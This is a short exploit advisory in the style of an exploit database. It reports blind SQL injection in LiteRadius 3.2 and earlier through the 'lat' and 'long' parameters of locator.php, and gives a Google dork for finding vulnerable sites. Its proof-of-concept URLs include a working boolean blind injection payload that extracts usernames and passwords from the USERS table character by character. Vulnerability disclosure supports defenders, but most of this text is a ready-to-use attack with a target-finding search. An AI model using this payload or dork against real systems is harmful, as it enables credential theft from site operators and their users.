# Exploit Title: LiteRadius <= 3.2 - Multiple Blind SQL Injection vulnerabilities # Google Dork: allinurl: locator.php?long= # Date: 7/12/2011 # Author: Robert Cooper (admin[at]websiteauditing.org) # Software Link: http://www.escaperadius.com/er/products/literadius/lr.php # Tested on: [Linux/Windows 7] #Vulnerable Parameters: lat=, long= ############################################################## PoC: http://domain.com/dealer/locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334' http://domain.com/dealer/locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334 and ascii(substring((SELECT concat(username,0x3a,password,0x3a,0x0a) FROM USERS limit 0,1),1,1))>80 ############################################################## www.websiteauditing.org www.areyousecure.net # Shouts to the Belegit crew